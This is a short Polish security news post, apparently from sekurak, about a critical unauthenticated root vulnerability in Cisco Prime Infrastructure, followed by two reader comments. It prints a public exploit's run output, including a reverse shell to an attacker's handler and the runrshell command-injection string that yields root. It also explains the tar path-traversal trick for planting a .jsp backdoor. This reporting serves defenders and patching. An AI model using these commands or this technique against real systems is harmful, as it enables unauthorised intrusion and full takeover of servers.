Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Cisco Prime Infrastructure – można dostać uprawnienia root bez uwierzytelnienia
Łata od Cisco tutaj. Krytyczność podatności to aż 9.8/10 w skali CVSS. Ale możliwość uzyskania dostępu na system operacyjny i później łatwa eskalacja uprawnień do roota to jest coś. Działanie dostępnego już exploitu:
$ ./poc.py 192.168.100.123 192.168.100.2:4444 (+) planted backdoor! (+) starting handler on port 4444 (+) connection from 192.168.100.123 (+) pop thy shell! python -c 'import pty; pty.spawn("/bin/bash")' [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0 sh-4.1# exit
Jaka jest istota podatności? Mamy tutaj dwa problemy – pierwszy to możliwość anonimowego uploadu spakowanego do .tar pliku .jsp – ale trzeba wykorzystać dodatkowy trick: nazwa pliku w archiwum musi „wyjść” do odpowiedniego katalogu. Pakujemy więc: ../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp
W skrócie, możemy nasz backdoor w .jsp wypakować do niemal dowolnego katalogu na serwerze (jeśli ktoś chce w pełni prześledzić ten trick, zachęcam do zerknięcia na podatność nr 1 z naszego publicznego raportu z pentestów).
Później już tylko banalna eskalacja uprawnień do roota w poleceniu runrshell: /opt/CSCOlumos/bin/runrshell '” && /bin/sh #’ i voila:
sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root)
–ms
Warto dodać, ze exploit/podatność jest do wykonania/wykorzystania tylko z sieci zarządzania, co znacząco utrudnia jej wykorzystanie. Dobre praktyki i standardy konfiguracji wymagają odseparowania sieci produkcyjnej od sieci zarządzania.
Niekoniecznie. Akurat CPrime histuje w wielu firmach portal sponsora wifi donktorego z definicji jest szeroki dostęp.